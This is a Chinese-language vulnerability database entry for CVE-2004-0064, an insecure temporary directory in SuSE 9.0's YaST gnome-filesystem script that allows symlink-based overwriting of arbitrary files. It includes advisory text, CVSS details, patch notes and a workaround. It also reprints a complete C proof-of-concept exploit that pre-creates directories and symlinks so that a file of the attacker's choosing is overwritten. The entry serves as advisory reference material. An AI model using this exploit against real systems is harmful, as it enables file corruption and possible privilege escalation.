CVE-2004-0064
CVSS2.1
发布时间 :2004-02-17 00:00:00
修订时间 :2016-10-17 22:40:26
NMCOES    

[原文]The SuSEconfig.gnome-filesystem script for YaST in SuSE 9.0 allows local users to overwrite arbitrary files via a symlink attack on files within the tmp.SuSEconfig.gnome-filesystem.$RANDOM temporary directory.


[CNNVD]SuSE YaST SuSEconfig.gnome-filesystem以不安全方式创建临时文件漏洞(CNNVD-200402-078)

        
        SuSE是一款开放源代码Linux系统。
        SuSEconfig.gnome-filesystem以不安全方式创建临时文件,本地攻击者可以利用这个漏洞利用符号连接攻击对系统文件进行破坏。
        在通过YaST执行脚本后,会建立'/tmp/tmp.SuSEconfig.gnome-filesystem.$RANDOM'临时文件,其中RANDOM为随机数(一般在1到33000之间),文件建立权限为任何用户可写,通过建立符号链接指向系统任意文件,当执行时可覆盖符号链接指向的文件,可导致系统崩溃或权限提升。
        

- CVSS (基础分值)

CVSS分值: 2.1 [轻微(LOW)]
机密性影响: NONE [对系统的机密性无影响]
完整性影响: PARTIAL [可能会导致系统文件被修改]
可用性影响: NONE [对系统可用性无影响]
攻击复杂度: LOW [漏洞利用没有访问限制 ]
攻击向量: LOCAL [漏洞利用需要具有物理访问权限或本地帐户]
身份认证: NONE [漏洞利用无需身份认证]

- CPE (受影响的平台与产品)

产品及版本信息(CPE)暂不可用

- OVAL (用于检测的技术细节)

未找到相关OVAL定义

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-0064
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2004-0064
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200402-078
(官方数据源) CNNVD

- 其它链接及资源

http://marc.info/?l=bugtraq&m=107402658600437&w=2
(UNKNOWN)  BUGTRAQ  20040113 SuSE linux 9.0 YaST config Skribt [exploit]
http://www.securityfocus.com/bid/9411
(VENDOR_ADVISORY)  BID  9411
http://www.securitytracker.com/id?1008703
(UNKNOWN)  SECTRACK  1008703

- 漏洞信息

SuSE YaST SuSEconfig.gnome-filesystem以不安全方式创建临时文件漏洞
低危 其他
2004-02-17 00:00:00 2005-10-20 00:00:00
本地  
        
        SuSE是一款开放源代码Linux系统。
        SuSEconfig.gnome-filesystem以不安全方式创建临时文件,本地攻击者可以利用这个漏洞利用符号连接攻击对系统文件进行破坏。
        在通过YaST执行脚本后,会建立'/tmp/tmp.SuSEconfig.gnome-filesystem.$RANDOM'临时文件,其中RANDOM为随机数(一般在1到33000之间),文件建立权限为任何用户可写,通过建立符号链接指向系统任意文件,当执行时可覆盖符号链接指向的文件,可导致系统崩溃或权限提升。
        

- 公告与补丁

        厂商补丁:
        S.u.S.E.
        --------
        目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载:
        
        http://www.suse.com/en/support/security/

- 漏洞信息 (144)

SuSE linux 9.0 YaST config Skribt Local Exploit (EDBID:144)
linux local
2004-01-15 Verified
0 l0om
N/A [点击下载]
#include <stdio.h>  
 #include <unistd.h>  
 #include <string.h>  
  
 #define PATH "/tmp/tmp.SuSEconfig.gnome-filesystem."  
 #define START 1  
 #define END 33000  
  
 int main(int argc, char **argv)  
 {  
 int i;  
 char buf[150];  
  
 printf("\tSuSE 9.0 YaST script 
SuSEconfig.gnome-filesystem exploit\n");  
 printf("\t-------------------------------------------------------------
\n");  
 printf("\tdiscovered and written by l0om 
<l0om excluded org>\n");  
 printf("\t WWW.EXCLUDED.ORG\n\n");  
  
 if(argc != 2) {  
 printf("usage: %s <destination-file>\n",argv[0]);  
 exit(0xff);  
 }  
  
 printf("### hit enter to create or overwrite file %
s: ",argv[1]); fflush(stdout);  
 read(1, buf, 1); fflush(stdin);  
  
 umask(0000);  
 printf("working\n\n");  
 for(i = START; i < END; i++) {  
 snprintf(buf, sizeof(buf),"%s%d",PATH,i);  
 if(mkdir(buf,00777) == -1) {  
 fprintf(stderr, "cannot creat directory [Nr.%d]
\n",i);  
 exit(0xff);  
 }  
 if(!(i%1000))printf(".");  
 strcat(buf, "/found");  
 if(symlink(argv[1], buf) == -1) {  
 fprintf(stderr, "cannot creat symlink from %s to %s 
[Nr.%d]\n",buf,argv[1],i);  
 exit(0xff);  
 }  
 }  
 printf("\ndone!\n");  
 printf("next time the SuSE.gnome-filesystem script 
gets executed\n");  
 printf("we will create or overwrite file %s
\n",argv[1]);  
 return(0x00);  
 }  /* i cant wait for the new gobbles comic!! */ 

// milw0rm.com [2004-01-15]
		

- 漏洞信息

3460
SuSE SuSEconfig.gnome-filesystem Symlink Arbitrary File Overwrite
Local Access Required Race Condition
Loss of Integrity

- 漏洞描述

The 'SuSEconfig.gnome-filesystem' script for YaST on SuSE Linux contains a flaw that may allow a malicious local user to manipulate arbitrary files on the system. The issue is due to the script creating temporary files insecurely in the 'tmp.SuSEconfig.gnome-filesystem.$RANDOM' temporary directory. It is possible for a user to use a symlink style attack to manipulate arbitrary files, resulting in a loss of integrity.

- 时间线

2004-01-12 Unknow
Unknow Unknow

- 解决方案

Currently, there are no known upgrades or patches to correct this issue. It is possible to correct the flaw by implementing the following workaround: a potential workaround would be to edit the SuSEconfig.gnome-filesystem script to change the TEMP=/tmp/tmp.SuSEconfig.gnome-filesystem.$RANDOM to something like TEMP=/tmp/tmp.SuSEconfig.gnome-filesystem.$$, making the PID based number more difficult to predict.

- 相关参考

- 漏洞作者

Unknown or Incomplete

- 漏洞信息

SuSE YaST SuSEconfig.gnome-filesystem Local Insecure File Creation Symlink Vulnerability
Origin Validation Error 9411
No Yes
2004-01-13 12:00:00 2004-01-13 12:00:00
Discovery of this vulnerability has been credited to l0om <l0om@excluded.org>.

- 受影响的程序版本

S.u.S.E. SuSEconfig.gnome-filesystem
+ S.u.S.E. Linux Personal 9.0

- 漏洞讨论

SuSEconfig.gnome-filesystem has been reported prone to an insecure file creation vulnerability that may be exploited to corrupt arbitrary files. The issue has been reported to present itself because the SuSEconfig.gnome-filesystem script will follow symbolic links when writing certain specific files.

SuSE Linux 9.0 has been reported to be prone to this issue, however, other versions could be affected as well.

- 漏洞利用

The following proof of concept exploit has been supplied:

- 解决方案

The vendor has reported that this issue has been fixed in SuSE 9.0 stable.

- 相关参考

 

 

关于SCAP中文社区

SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

版权声明

CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站